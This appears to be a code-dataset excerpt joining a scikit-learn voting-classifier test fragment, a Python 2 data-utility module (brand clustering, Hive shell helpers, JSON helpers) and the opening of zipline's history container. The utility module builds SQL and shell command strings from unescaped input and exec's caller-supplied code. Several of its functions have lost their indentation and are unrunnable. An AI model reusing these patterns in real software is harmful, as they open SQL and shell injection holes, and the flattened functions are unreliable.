        pass
    else:
        raise AssertionError('AttributeError for voting == "hard"'
                             ' and with predict_proba not raised')
def test_multilabel():
    """Check if error is raised for multilabel classification."""
    X, y = make_multilabel_classification(n_classes=2, n_labels=1,
                                          allow_unlabeled=False,
                                          random_state=123)
    clf = OneVsRestClassifier(SVC(kernel='linear'))

    eclf = VotingClassifier(estimators=[('ovr', clf)], voting='hard')

    # Multilabel targets are unsupported: NotImplementedError is the accepted
    # outcome; any other exception propagates as a test failure.
    try:
        eclf.fit(X, y)
    except NotImplementedError:
        return
def test_gridsearch():
    """Check GridSearch support."""
    clf1 = LogisticRegression(random_state=1)
    clf2 = RandomForestClassifier(random_state=1)
    clf3 = GaussianNB()
    eclf = VotingClassifier(estimators=[
        ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
        voting='soft')

    # Grid spans nested estimator params (lr__C) plus ensemble-level ones;
    # the success criterion is simply that the search fits without error.
    params = {'lr__C': [1.0, 100.0],
              'voting': ['soft', 'hard'],
              'weights': [[0.5, 0.5, 0.5], [1.0, 0.5, 0.5]]}

    grid = GridSearchCV(estimator=eclf, param_grid=params, cv=5)
    grid.fit(iris.data, iris.target)
| bsd-3-clause |
popoyz/charts | common/utils.py | 1 | 19081 | # coding=utf-8
from __base__.error import APIError
import os
import re
import urllib2
import urllib
from decimal import Decimal
import json
import glob
import time
from traceback import format_exc
from pandas import DataFrame, Series
import pandas as pd
import numpy as np
from collections import Iterable as IterType
from logging import getLogger, DEBUG
from types import StringTypes
logger = getLogger()
logger.setLevel(DEBUG)
def is_chinese(uchar):
    """Return True when ``uchar`` lies in the CJK Unified Ideographs range."""
    return u'\u4e00' <= uchar <= u'\u9fa5'
def is_number(uchar):
    """Return True when ``uchar`` is an ASCII digit '0'-'9'."""
    return u'\u0030' <= uchar <= u'\u0039'
def is_alphabet(uchar):
    """Return True when ``uchar`` is an ASCII letter (A-Z or a-z)."""
    upper = u'\u0041' <= uchar <= u'\u005a'
    lower = u'\u0061' <= uchar <= u'\u007a'
    return upper or lower
def is_other(uchar):
    """Return True when ``uchar`` is neither a CJK ideograph, an ASCII digit,
    nor an ASCII letter."""
    recognised = is_chinese(uchar) or is_number(uchar) or is_alphabet(uchar)
    return not recognised
def strQ2B(ustring):
    """Convert full-width (zenkaku) characters to half-width (hankaku)."""
    rstring = ""
    for uchar in ustring:
        inside_code = ord(uchar)
        if inside_code == 12288:  # full-width space (U+3000) maps directly to ASCII space
            inside_code = 32
        elif (inside_code >= 65281 and inside_code <= 65374):  # full-width forms U+FF01-U+FF5E shift down into ASCII
            inside_code -= 65248
        rstring += unichr(inside_code)  # NOTE: unichr is Python 2 only
    return rstring
def dictToSql(data, inner=None, outer=None):
    """Build a list of SQL assignment fragments ("`key`='value'") from a dict.

    :param data: mapping of column name -> value.
    :param inner: optional list of keys; when given, only those keys (if
        present in ``data``) produce fragments.
    :param outer: optional list of keys to delete from ``data`` in place
        (caller-visible side effect, kept for compatibility).
    :returns: list of "`key`='value'" strings (empty when ``data`` is falsy).

    WARNING: values are interpolated with no escaping, so the result is
    vulnerable to SQL injection when ``data`` holds untrusted input; prefer
    parameterized queries at the call site.
    """
    result = {}
    if data:
        # isinstance instead of type()==list; iterating the dict itself
        # covers the "no inner filter" case.
        keys = inner if isinstance(inner, list) else data
        for key in keys:
            if key in data:
                result[key] = r"`{}`='{}'".format(key, data[key])
        if isinstance(outer, list):
            for key in outer:
                if key in data:
                    del data[key]
    # Materialize to a list (Python 2 .values() returned one; Python 3 a view).
    return list(result.values())
def defaultencode(obj):
    """``json.dumps`` ``default=`` hook for Decimal/datetime/date values.

    Decimals are wrapped in :class:`fakefloat` so their exact textual value
    survives serialization; datetimes and dates are rendered with ``str``.
    Anything else raises TypeError, as the json protocol requires.
    """
    if isinstance(obj, Decimal):
        # float subclass with a custom repr keeps the Decimal's exact digits.
        return fakefloat(obj)
    # Only datetime is actually needed (calendar/time imports were unused).
    import datetime
    # datetime instances are also date instances; both render the same way.
    if isinstance(obj, (datetime.datetime, datetime.date)):
        return "{}".format(obj)
    raise TypeError(repr(obj) + " is not JSON serializable")
class fakefloat(float):
    """float subclass whose ``repr`` is the text of the value it wraps.

    Lets json serialization of Decimal values emit the exact decimal digits
    instead of a lossy binary-float repr.
    """

    def __init__(self, value):
        # Keep the original object purely for its string form.
        self._source = value

    def __repr__(self):
        return str(self._source)
def get_trans_punc_func():
    """Build a closure mapping Chinese punctuation to ASCII equivalents."""
    # NOTE(review): the multi-character keys (ellipsis, em-dash) can never
    # match the per-character scan below; behaviour preserved as-is.
    punc_mapping = {
        u'“': u'"',
        u'”': u'"',
        u'·': u'.',
        u'。': u'.',
        u'!': u'!',
        u'……': u'......',
        u'(': u'(',
        u')': u')',
        u'——': u'--',
        u'【': u'[',
        u'】': u']',
        u'{': u'{',
        u'}': u'}',
        u'‘': u'\'',
        u'’': u'\'',
        u',': u',',
        u'?': u'?',
        u':': u':',
        u';': u';',
        u'《': u'<',
        u'》': u'>'
    }

    def _transform_punctuation(ustring):
        # Translate character by character, passing unknown ones through.
        return ''.join(punc_mapping.get(c, c) for c in ustring)

    return _transform_punctuation


transform_punctuation = get_trans_punc_func()
def _get_dedup_empty():
"""将连续空白符替换成单个空白符"""
import re
multi_empty_p = re.compile(r'\s{2,}')
def _dedup_empty(ustr):
return multi_empty_p.subn(u' ', ustr)[0]
return _dedup_empty
dedup_empty = _get_dedup_empty()
def _get_remove_bracket():
"""去掉括号内的信息"""
import re
bracket_p = re.compile(r'(\(.*\))')
def _remove_bracket(ustr):
return bracket_p.subn(u'', ustr)[0]
return _remove_bracket
remove_bracket = _get_remove_bracket()
def split_by_cn_en(ustring):
    """Split ``ustring`` into runs of Chinese vs. non-Chinese characters.

    A new segment starts whenever the scan crosses a boundary between a CJK
    ideograph and an ASCII letter; characters that are neither (digits,
    punctuation, whitespace) simply extend the current segment.
    """
    retList = []
    utmp = []
    _state = 0  # 0 = in a non-Chinese run, 1 = in a Chinese run
    _split = False  # whether the current character triggers a segment break
    for uchar in ustring:
        if is_chinese(uchar):
            if _state == 0:
                _split = True
                _state = 1
        elif is_alphabet(uchar):
            if _state == 1:
                _split = True
                _state = 0
        if _split:
            # Flush the accumulated run before starting the next one.
            if len(utmp) > 0:
                retList.append(''.join(utmp))
                utmp = []
            _split = False
        utmp.append(uchar)
    # Flush the trailing run.
    if len(utmp) > 0:
        retList.append(''.join(utmp))
    return retList
from datetime import datetime, timedelta
def get_lastmonth_str(date_str):
    """Return the first day of the month preceding ``date_str``'s month.

    :param date_str: date in '%Y-%m-%d' form (callers pass 'YYYY-MM-01').
    :returns: 'YYYY-MM-01' string for the previous month.
    """
    month_obj = datetime.strptime(date_str, '%Y-%m-%d').date()
    # Fix: stepping back one day only reaches the previous month when the
    # input is the 1st; normalise to day 1 first so any day of the month
    # works.  Behaviour is unchanged for the 'YYYY-MM-01' inputs used here.
    last_month = month_obj.replace(day=1) - timedelta(days=1)
    return '%d-%02d-01' % (last_month.year, last_month.month)
def get_lastyearmonth_str(date_str):
    """Return the same month one year before ``date_str``, as 'YYYY-MM-01'.

    :param date_str: date in '%Y-%m-%d' form.
    """
    month_obj = datetime.strptime(date_str, '%Y-%m-%d').date()
    # Fix: subtracting a flat 365 days drifts across leap years and can land
    # in the wrong month for end-of-month inputs; decrement the year
    # directly.  Behaviour is unchanged for 'YYYY-MM-01' inputs.
    return '%d-%02d-01' % (month_obj.year - 1, month_obj.month)
def normalize_str4brand(u_str, encoding='utf-8'):
    """Canonicalise a brand-name string for matching.

    Decodes bytes to unicode (Python 2 ``unicode``/``str`` semantics),
    lowercases, converts full-width to half-width characters, maps Chinese
    punctuation to ASCII, collapses repeated whitespace, strips, and drops
    any parenthesised suffix.
    """
    if not isinstance(u_str, unicode) and isinstance(u_str, str):  # NOTE: Python 2 only
        u_str = u_str.decode(encoding)
    assert isinstance(u_str, unicode)
    u_str = u_str.lower()
    u_str = strQ2B(u_str)
    u_str = transform_punctuation(u_str)
    u_str = dedup_empty(u_str)
    u_str = u_str.strip()
    u_str = remove_bracket(u_str)
    return u_str
def cluster_brands(brands_list, one_one_mapping=None, kw_mapping=None, kw_match=1.0, split_symbol='/', cn_split=False):
    '''
    Cluster brand names into groups headed by a principal brand.

    brands_list - brands to cluster; order matters: within a cluster the
        first brand seen becomes the principal brand.
    one_one_mapping - dict of alias -> principal brand, matched exactly.
    kw_mapping - principal brand -> set(keyword1, keyword2, ...).
    kw_match - if int, at least this many keywords must match (the
        principal with the most matches wins); if float, at least this
        fraction of the brand's keywords must match.
    split_symbol - symbol used to split a brand string into keywords.
    cn_split - if True, additionally split keywords at Chinese/English
        boundaries.
    '''
    if one_one_mapping is None:
        one_one_mapping = {}
    if kw_mapping is None:
        kw_mapping = {}
    # alias lookup keyed by the *normalized* alias spelling
    _tmp_one_one_mapping = {}
    for alias, principle in one_one_mapping.items():
        _tmp_one_one_mapping[normalize_str4brand(alias)] = principle
    # keyword -> principal brand, keyed by the normalized keyword
    _tmp_kw_mapping = {}
    for principle, kw_set in kw_mapping.items():
        for kw in kw_set:
            _tmp_kw_mapping[normalize_str4brand(kw)] = principle
    brands_cluster = {}  # brand -> set of brands
    for brand in brands_list:
        normalized_brand = normalize_str4brand(brand)
        # direct one one mapping
        one_one_brand = _tmp_one_one_mapping.get(normalized_brand, None)
        if one_one_brand:
            if one_one_brand not in brands_cluster:
                brands_cluster[one_one_brand] = set()
            # the final clusters keep the pre-normalization spellings
            brands_cluster[one_one_brand].add(brand)
            continue
        # also try the raw, un-normalized spelling as an alias key
        one_one_brand = _tmp_one_one_mapping.get(brand, None)
        if one_one_brand:
            if one_one_brand not in brands_cluster:
                brands_cluster[one_one_brand] = set()
            # the final clusters keep the pre-normalization spellings
            brands_cluster[one_one_brand].add(brand)
            continue
        # try kw match
        if split_symbol:
            symbol_kw_set = set(normalized_brand.split(split_symbol))
        else:
            symbol_kw_set = set([normalized_brand, ])
        if cn_split:
            kw_set = set()
            for kw in symbol_kw_set:
                kw_set.update(split_by_cn_en(kw))
        else:
            kw_set = symbol_kw_set
        candidate_dict = {}  # principle -> count
        for kw in kw_set:
            principle = _tmp_kw_mapping.get(kw, None)
            if principle:
                if principle not in candidate_dict:
                    candidate_dict[principle] = 0
                candidate_dict[principle] += 1
        if candidate_dict:
            # best candidate first (most keyword hits)
            candidate_tuple_list = sorted(candidate_dict.items(), key=lambda k: k[1], reverse=True)
            found = False
            if isinstance(kw_match, float):
                percent = candidate_tuple_list[0][1] * 1.0 / len(kw_set)
                if percent >= kw_match:
                    found = True
            elif isinstance(kw_match, int):
                if candidate_tuple_list[0][1] >= kw_match:
                    found = True
            else:
                raise TypeError("Need float or int")
            if found:
                if candidate_tuple_list[0][0] not in brands_cluster:
                    brands_cluster[candidate_tuple_list[0][0]] = set()
                brands_cluster[candidate_tuple_list[0][0]].add(brand)
                # add this brand's keywords to the principal brand's
                # keyword list, to widen recall for later brands
                for kw in kw_set:
                    if kw not in _tmp_kw_mapping:
                        _tmp_kw_mapping[kw] = candidate_tuple_list[0][0]
                continue
        # cluster: no mapping matched, so this brand starts its own
        # cluster and claims its keywords
        brands_cluster[brand] = set([brand, ])
        for kw in kw_set:
            if kw not in _tmp_kw_mapping:
                _tmp_kw_mapping[kw] = brand
    return brands_cluster
def array_column(data, format, format_str=False):
    """Extract one column from a collection of row dicts.

    e.g. ``array_column([{'name': 'a', 'id': 1}, {'name': 'b', 'id': 2}], 'name')``
    returns ``['a', 'b']``.  If *format_str* is true, date/datetime values
    are converted to their ISO-format strings.

    Fixes:
    * the old code compared ``type(value) == datetime.date`` while the
      module imports ``from datetime import datetime`` — that compared
      against a *method* of the datetime class and was always False, so
      format_str never converted anything; isinstance against the real
      date type (which datetime subclasses) is used instead.
    * the dict branch enumerated the dict (its keys) and then subscripted
      the key, which could never succeed; it now iterates the values.
      NOTE(review): presumed intent — verify against callers.
    """
    from datetime import date as _date

    def _value(row):
        value = row[format]
        # datetime is a subclass of date, so one isinstance covers both.
        if format_str and isinstance(value, _date):
            return value.isoformat()
        return value

    result = []
    if type(format) == str and format.strip() != '':
        if type(data) == list:
            for row in data:
                result.append(_value(row))
        elif type(data) == dict:
            for row in data.values():
                result.append(_value(row))
    return result
def dbFormatToDict(data, format):
    """Re-key a sequence of row dicts by one column (str *format*) or by
    the concatenation of several columns (non-empty list/dict *format*).

    An empty-string format returns *data* unchanged; an unsupported
    format yields {}.
    """
    if type(format) == str:
        if not format.strip():
            return data
        return dict((row[format], row) for row in data)
    if (type(format) == list and format) or (type(format) == dict and format):
        keyed = {}
        for row in data:
            key = ''.join(row[col] for col in format)
            keyed[key] = row
        return keyed
    return {}
def _format_hql(content):
return content.replace('`', '')
def heqExec(hql):
    """Run *hql* through the Hive CLI, discarding output.

    Returns True on a zero exit status, False otherwise.
    """
    command = 'hive -e "{}" >/dev/null 2>&1'.format(_format_hql(hql))
    return os.system(command) == 0
def is_exist_hive(table):
    """Return True when ``show create table`` succeeds for *table*,
    i.e. the Hive table exists and is readable."""
    command = ' hive -e "show create table {};" '.format(_format_hql(table))
    return os.system(command) == 0
def sumStr(string):
    """Return the hex MD5 digest of *string*, UTF-8 encoded."""
    from hashlib import md5
    return md5(string.encode('utf-8')).hexdigest()
def get_hive_column(h_table):
    # Run `desc <table>` through the Hive CLI and parse the output into
    # [all column names, partition columns].  Partition columns appear a
    # second time in `desc` output, which is how they are detected here.
    # (Python 2: popen output is a byte string and is decoded as UTF-8.)
    p = os.popen(''' hive -e "desc {};" '''.format(h_table))
    table_info = p.read().decode('utf-8')
    result = []
    part = []
    table_info = table_info.split('\n')
    for item in table_info:
        # `desc` rows are tab-separated; the first cell is the column name
        m = item.split('\t')
        m = m[0].strip()
        if "#" in m or not m:
            # header/comment lines and blanks
            pass
        elif m not in result:
            result.append(m)
        elif m in result:
            # second occurrence => partition column
            part.append(m)
    if p.close():
        # non-zero exit status from hive: report nothing
        result = []
        part = []
    return [result, part]
def get_hive_location(h_table):
    # Parse `desc formatted <table>` output for the HDFS location line.
    # Returns '' when hive fails or no matching line is found.
    p = os.popen(''' hive -e "desc formatted {};" '''.format(h_table))
    table_info = p.readlines()
    location = ''
    if table_info:
        for item in table_info:
            item = item.decode('utf-8')
            # the location row looks like "Location:\thdfs://.../xxx.db/tbl"
            if 'Location:' in item and 'hdfs:' in item and 'db' in item:
                table = item.split("\t", 1)
                location = table[1].strip()
    if p.close():
        # non-zero hive exit status invalidates whatever was parsed
        location = ''
    return location
def get_partitions(h_table):
    # Return the *last* partition of a table (tail -n1 of
    # `show partitions`), or '' when hive fails.  Any trailing newline
    # from the pipeline is kept as-is.
    p = os.popen(''' hive -e "show partitions {};"|tail -n1 '''.format(h_table))
    table_info = p.readlines()
    result = ''
    if table_info:
        for item in table_info:
            item = item.decode('utf-8')
            result = item
    if p.close():
        result = ''
    return result
def get_uniquekey(db, table):
result = ''
_match = re.compile(r"(`.*`)")
try:
p = db.query('show create table {};'.format(table))
for it in p:
it = it['Create Table']
it = it.split('\n')
for item in it:
if 'PRIMARY KEY'.lower() in item.lower():
result = _match.search(item).group(0).replace("`", "")
if 'UNIQUE key'.lower() in item.lower() or 'UNIQUE index'.lower() in item.lower():
result = _match.search(item).group(0).replace("`", "")
except Exception, e:
from traceback import print_exc
print_exc()
return result
pass
def handle_hive_sort(create_sql):
    # NOTE(review): the early return below short-circuits the whole
    # function, so the "STORED AS RCFILE" rewriting underneath is dead
    # code.  It looks deliberately disabled; confirm before re-enabling.
    return create_sql
    sql = ''
    if create_sql:
        create_sql = create_sql.lower()
        # drop a trailing ';' so the suffix can be appended safely
        create_sql = re.sub(";(\s)*$", "", create_sql).strip()
        if 'stored as' in create_sql:
            # a storage clause is already present; leave the DDL alone
            sql = create_sql
        else:
            # insert "STORED AS RCFILE" just before the LOCATION clause,
            # or append it when there is no LOCATION at all
            _p = re.compile('\(.*\).*(location.*)')
            m = _p.search(create_sql)
            if m:
                s = m.groups()
                if s:
                    _m = s[-1]
                    sql = create_sql.replace(r'{}'.format(_m), ' STORED AS RCFILE {}'.format(_m))
            else:
                sql = "{} STORED AS RCFILE".format(create_sql)
    return sql + ";"
def get_json_hierarchy(_json_obj, arch_ele_list):
    """Walk nested dicts following the keys in *arch_ele_list*.

    Returns the value at the end of the path, or None as soon as any key
    along the path is missing.  An empty path returns the object itself.
    """
    node = _json_obj
    for key in arch_ele_list:
        if key not in node:
            return None
        node = node[key]
    return node
def format_ifram_url(url, search):
    """Rewrite a dashboard iframe URL: substitute *search* for the ``'*'``
    query placeholder and shrink the iframe to embed size.

    The old code called ``str.format`` on the *whole* URL after planting a
    ``{}`` placeholder, which raised KeyError/IndexError whenever the URL
    contained any other brace characters; the search term is now
    formatted into the replacement snippet only.
    """
    return url.replace("query:'*'", "query:'{}'".format(search)) \
              .replace(r'height="600" width="800"', r'height="352" width="100%"')
def _req_url(url, data=None, repeat=4):
    # POST *data* (JSON-encoded; {} when None) to *url*, retrying up to
    # *repeat* times; each failure is logged and APIError is raised once
    # all attempts fail.  (Python 2: urllib2 and `except Exception, e`
    # syntax; `e` is still bound after the loop because Python 2 leaks
    # the except target, so the final raise can reference it.)
    data = json.dumps(data or {})
    for _ in range(repeat):
        try:
            logger.debug("Request {}".format(url))
            return urllib2.urlopen(urllib2.Request(url, data)).read()
        except Exception, e:
            logger.error(format_exc())
    raise APIError(u"获取不到数据,{}!".format(e))
def _req_url_body(url, data, isput=False):
    # Send *data* as a JSON request body to *url* (PUT when isput is
    # true, POST otherwise) and return the raw response.
    # NOTE(review): the loop was once a retry loop, but its except clause
    # is commented out, so the first attempt either succeeds (break) or
    # lets the urllib2 error propagate — the remaining iterations never
    # run.  Kept as-is.
    repeat = 4
    req = ''
    data = json.dumps(data)
    for j in range(repeat):
        # try:
        res = urllib2.Request(url, data, {'Content-Type': 'application/json'})
        if isput:
            # urllib2 has no native PUT support; override the method hook
            res.get_method = lambda: 'PUT'
        req = urllib2.urlopen(res).read()
        break
        # except Exception, e:
        # pass
    if req == '':
        raise Exception(url + u"获取不到数据")
    return req
def get_py_file(dirs):
    """Return module names (no extension) of the *.py files matching the
    glob pattern *dirs*, skipping dunder-prefixed modules.

    A falsy pattern yields an empty list.
    """
    if not dirs:
        return []
    names = []
    for path in glob.glob(dirs):
        stem, ext = os.path.splitext(os.path.basename(path))
        # skip __init__.py and friends
        if ext == ".py" and not stem.startswith("__"):
            names.append(stem)
    return names
def defaultnumber(object):
    """Best-effort numeric coercion: int if possible, else float, else
    the value unchanged.  Non-ValueError failures (e.g. TypeError for
    None) propagate, as before."""
    for cast in (int, float):
        try:
            return cast(object)
        except ValueError:
            continue
    return object
def format_number(rows):
    """Copy *rows* (a list of dicts), coercing string values to numbers
    where possible after stripping thousands separators."""
    def _coerce(value):
        if isinstance(value, StringTypes):
            return defaultnumber(value.replace(",", ""))
        return value

    return [dict((key, _coerce(value)) for key, value in row.items()) for row in rows]
def data_trans(data, columns_names, code, istable=True):
    # Build a DataFrame from *data* (numbers coerced via format_number),
    # optionally run a user-supplied transform — *code* must define a
    # function `trans(frame)` and is executed with exec — then fill NaNs
    # with '' and, when istable, flatten to a row list via to_table.
    # Returns False on any error (the traceback is printed).
    # WARNING: exec of caller-supplied *code* runs arbitrary Python; only
    # acceptable because callers are trusted/internal.
    # (Python 2: `exec code` statement and `except Exception, e` syntax.)
    if columns_names:
        data = DataFrame([x for x in format_number(data)], columns=columns_names)
    else:
        data = DataFrame([x for x in format_number(data)])
    try:
        if code:
            exec code
            result = trans(data).fillna('')
        else:
            result = data.fillna('')
        if istable:
            result = to_table(result)
        return result
    except Exception, e:
        from traceback import print_exc
        print_exc()
        return False
def muti_data_trans(data, code, istable=True):
    # Multi-frame variant of data_trans: *data* is a sequence of frames
    # handed to a user-defined trans(); when no code is given, trans
    # defaults to taking the first frame.  Returns False on any error.
    # WARNING: exec of caller-supplied *code* runs arbitrary Python.
    try:
        if not code:
            code = "def trans(frame):\n return frame[0]"
        exec code
        result = trans(data).fillna('')
        if istable:
            result = to_table(result)
        return result
    except Exception, e:
        from traceback import print_exc
        print_exc()
        return False
def to_table(frame):
    """Flatten a DataFrame into a list of rows, the first row being the
    header.  When the index is named, each index value is prepended to
    its row and the index name leads the header."""
    header = list(frame.columns.values)
    named_index = frame.index.name
    if named_index:
        header = [named_index] + header
    rows = np.array(frame).tolist()
    if named_index:
        index_values = frame.index.values.tolist()
        for position, row in enumerate(rows):
            row.insert(0, index_values[position])
    rows.insert(0, header)
    return rows
def to_dict(table, insert_header=None, isHeader=True):
    """Inverse of to_table: turn [header, row, row, ...] into row dicts.

    insert_header - optional list of dicts whose key/value pairs are
        merged into every row (and whose keys are prepended to the header
        when isHeader is true).  The old signature used a mutable default
        argument ([]); None is used now, with unchanged behaviour.
    isHeader - when true, return (header, rows); otherwise just rows.

    NOTE(review): when isHeader is true the header row of *table* is
    extended in place, mutating the caller's list — preserved as-is
    since callers may rely on it.
    """
    if insert_header is None:
        insert_header = []
    header = table[0]
    data = []
    for key, item in enumerate(table):
        if key == 0:
            continue
        tmp = {}
        for extra in insert_header:
            tmp.update(extra)
        for k, it in enumerate(item):
            tmp[header[k]] = it
        data.append(tmp)
    if not isHeader:
        return data
    for extra in insert_header:
        for t in extra:
            header.insert(0, t)
    return header, data
def get_time(isnow=True):
    """Current local time as 'YYYY-MM-DD HH:MM:SS', or a far-future
    sentinel timestamp when *isnow* is False."""
    if not isnow:
        return "2038-01-01 00:00:00"
    return time.strftime("%Y-%m-%d %X", time.localtime(time.time()))
# ============================================================================
def to_iter(items=()):
    """Wrap *items* in a list unless it is already a non-string iterable.

    1 -> [1, ]
    (1, 2) -> (1, 2)
    "123" -> ["123", ]
    """
    if isinstance(items, IterType) and not isinstance(items, basestring):
        return items
    return [items]
| lgpl-3.0 |
wubr2000/zipline | zipline/history/history_container.py | 18 | 33931 | #
# Copyright 2014 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from bisect import insort_left
from collections import namedtuple
from itertools import groupby, product
import logbook
import numpy as np
import pandas as pd
from six import itervalues, iteritems, iterkeys
from . history import HistorySpec
from zipline.finance.trading import with_environment
from zipline.utils.data import RollingPanel, _ensure_index
from zipline.utils.munge import ffill, bfill
logger = logbook.Logger('History Container')
# The closing price is referred to by multiple names,
# allow both for price rollover logic etc.
CLOSING_PRICE_FIELDS = frozenset({'price', 'close_price'})
def ffill_buffer_from_prior_values(freq,
                                   field,
                                   buffer_frame,
                                   digest_frame,
                                   pv_frame,
                                   raw=False):
    """
    Forward-fill a buffer frame, falling back to the end-of-period values of a
    digest frame if the buffer frame has leading NaNs.

    When ``raw`` is true the inputs are treated as plain ndarrays and the
    filled ndarray is returned; otherwise a forward-filled DataFrame comes
    back.  NOTE: in raw mode ``buffer_values`` aliases the caller's data,
    so the leading-row seeding below mutates it in place.
    """
    # convert to ndarray if necessary
    digest_values = digest_frame
    if raw and isinstance(digest_frame, pd.DataFrame):
        digest_values = digest_frame.values
    buffer_values = buffer_frame
    if raw and isinstance(buffer_frame, pd.DataFrame):
        buffer_values = buffer_frame.values
    nan_sids = pd.isnull(buffer_values[0])
    if np.any(nan_sids) and len(digest_values):
        # If we have any leading nans in the buffer and we have a non-empty
        # digest frame, use the oldest digest values as the initial buffer
        # values.
        buffer_values[0, nan_sids] = digest_values[-1, nan_sids]
        nan_sids = pd.isnull(buffer_values[0])
    if np.any(nan_sids):
        # If we still have leading nans, fall back to the last known values
        # from before the digest.
        key_loc = pv_frame.index.get_loc((freq.freq_str, field))
        filler = pv_frame.values[key_loc, nan_sids]
        buffer_values[0, nan_sids] = filler
    if raw:
        filled = ffill(buffer_values)
        return filled
    return buffer_frame.ffill()
def ffill_digest_frame_from_prior_values(freq,
                                         field,
                                         digest_frame,
                                         pv_frame,
                                         raw=False):
    """
    Forward-fill a digest frame, falling back to the last known prior values if
    necessary.

    When ``raw`` is true the input is treated as a plain ndarray and the
    filled ndarray is returned.  NOTE: in raw mode ``values`` aliases the
    caller's data, so the leading-row seeding below mutates it in place.
    """
    # convert to ndarray if necessary
    values = digest_frame
    if raw and isinstance(digest_frame, pd.DataFrame):
        values = digest_frame.values
    nan_sids = pd.isnull(values[0])
    if np.any(nan_sids):
        # If we have any leading nans in the frame, use values from pv_frame to
        # seed values for those sids.
        key_loc = pv_frame.index.get_loc((freq.freq_str, field))
        filler = pv_frame.values[key_loc, nan_sids]
        values[0, nan_sids] = filler
    if raw:
        filled = ffill(values)
        return filled
    return digest_frame.ffill()
def freq_str_and_bar_count(history_spec):
    """Return (frequency string, bar count) for *history_spec* — the sort
    key used when grouping specs by frequency."""
    frequency = history_spec.frequency
    return frequency.freq_str, history_spec.bar_count
@with_environment()
def next_bar(spec, env):
    """
    Returns a function that will return the next bar for a given datetime.
    """
    # Daily specs driven by minute data advance to the *close* of the
    # next trading day; daily-on-daily steps one trading day; anything
    # else (minutely specs) steps one market minute.
    if spec.frequency.unit_str == 'd':
        if spec.frequency.data_frequency == 'minute':
            # get_open_and_close returns (open, close); take the close
            return lambda dt: env.get_open_and_close(
                env.next_trading_day(dt),
            )[1]
        else:
            return env.next_trading_day
    else:
        return env.next_market_minute
def compute_largest_specs(history_specs):
    """
    Maps a Frequency to the largest HistorySpec at that frequency from an
    iterable of HistorySpecs.

    Ties on bar_count keep the earliest spec, matching the previous
    sort/groupby/max implementation.
    """
    largest = {}
    for spec in history_specs:
        incumbent = largest.get(spec.frequency)
        if incumbent is None or spec.bar_count > incumbent.bar_count:
            largest[spec.frequency] = spec
    return largest
# tuples to store a change to the shape of a HistoryContainer

# A change in buffer length required to support a newly added frequency.
# buffer_delta is None when a fresh buffer panel had to be created.
FrequencyDelta = namedtuple(
    'FrequencyDelta',
    ['freq', 'buffer_delta'],
)

# A change in bar count for an existing frequency's digest panel.
LengthDelta = namedtuple(
    'LengthDelta',
    ['freq', 'delta'],
)

# Base tuple for HistoryContainerDelta below; any field may be None,
# meaning "no change of that kind".
HistoryContainerDeltaSuper = namedtuple(
    'HistoryContainerDelta',
    ['field', 'frequency_delta', 'length_delta'],
)
class HistoryContainerDelta(HistoryContainerDeltaSuper):
    """
    Describes a resize of the history container.  Any component left as
    None means no change of that kind occurred.
    """
    def __new__(cls, field=None, frequency_delta=None, length_delta=None):
        """
        field: a newly added field, if any.
        frequency_delta: a FrequencyDelta when a new frequency was added.
        length_delta: a LengthDelta (a frequency plus a bar_count change).
        """
        return super(HistoryContainerDelta, cls).__new__(
            cls, field, frequency_delta, length_delta,
        )

    @property
    def empty(self):
        """
        True when no change of any kind is recorded.
        """
        return all(
            part is None
            for part in (self.field, self.frequency_delta, self.length_delta)
        )
def normalize_to_data_freq(data_frequency, dt):
    """Minute-frequency timestamps pass through untouched; anything else
    (daily) is normalized to midnight."""
    if data_frequency != 'minute':
        return pd.tslib.normalize_date(dt)
    return dt
class HistoryContainer(object):
"""
Container for all history panels and frames used by an algoscript.
To be used internally by TradingAlgorithm, but *not* passed directly to the
algorithm.
Entry point for the algoscript is the result of `get_history`.
"""
VALID_FIELDS = {
'price', 'open_price', 'volume', 'high', 'low', 'close_price',
}
def __init__(self,
history_specs,
initial_sids,
initial_dt,
data_frequency,
bar_data=None):
"""
A container to hold a rolling window of historical data within a user's
algorithm.
Args:
history_specs (dict[Frequency:HistorySpec]): The starting history
specs that this container should be able to service.
initial_sids (set[Asset or Int]): The starting sids to watch.
initial_dt (datetime): The datetime to start collecting history from.
bar_data (BarData): If this container is being constructed during
handle_data, this is the BarData for the current bar to fill the
buffer with. If this is constructed elsewhere, it is None.
Returns:
An instance of a new HistoryContainer
"""
# History specs to be served by this container.
self.history_specs = history_specs
self.largest_specs = compute_largest_specs(
itervalues(self.history_specs)
)
# The set of fields specified by all history specs
self.fields = pd.Index(
sorted(set(spec.field for spec in itervalues(history_specs)))
)
self.sids = pd.Index(
sorted(set(initial_sids or []))
)
self.data_frequency = data_frequency
initial_dt = normalize_to_data_freq(self.data_frequency, initial_dt)
# This panel contains raw minutes for periods that haven't been fully
# completed. When a frequency period rolls over, these minutes are
# digested using some sort of aggregation call on the panel (e.g. `sum`
# for volume, `max` for high, `min` for low, etc.).
self.buffer_panel = self.create_buffer_panel(initial_dt, bar_data)
# Dictionaries with Frequency objects as keys.
self.digest_panels, self.cur_window_starts, self.cur_window_closes = \
self.create_digest_panels(initial_sids, initial_dt)
# Helps prop up the prior day panel against having a nan, when the data
# has been seen.
self.last_known_prior_values = pd.DataFrame(
data=None,
index=self.prior_values_index,
columns=self.prior_values_columns,
# Note: For bizarre "intricacies of the spaghetti that is pandas
# indexing logic" reasons, setting this dtype prevents indexing
# errors in update_last_known_values. This is safe for the time
# being because our only forward-fillable fields are floats. If we
# need to add a non-float-typed forward-fillable field, then we may
# find ourselves having to track down and fix a pandas bug.
dtype=np.float64,
)
_ffillable_fields = None
@property
def ffillable_fields(self):
if self._ffillable_fields is None:
fillables = self.fields.intersection(HistorySpec.FORWARD_FILLABLE)
self._ffillable_fields = fillables
return self._ffillable_fields
@property
def prior_values_index(self):
index_values = list(
product(
(freq.freq_str for freq in self.unique_frequencies),
# Only store prior values for forward-fillable fields.
self.ffillable_fields,
)
)
if index_values:
return pd.MultiIndex.from_tuples(index_values)
else:
# MultiIndex doesn't gracefully support empty input, so we return
# an empty regular Index if we have values.
return pd.Index(index_values)
@property
def prior_values_columns(self):
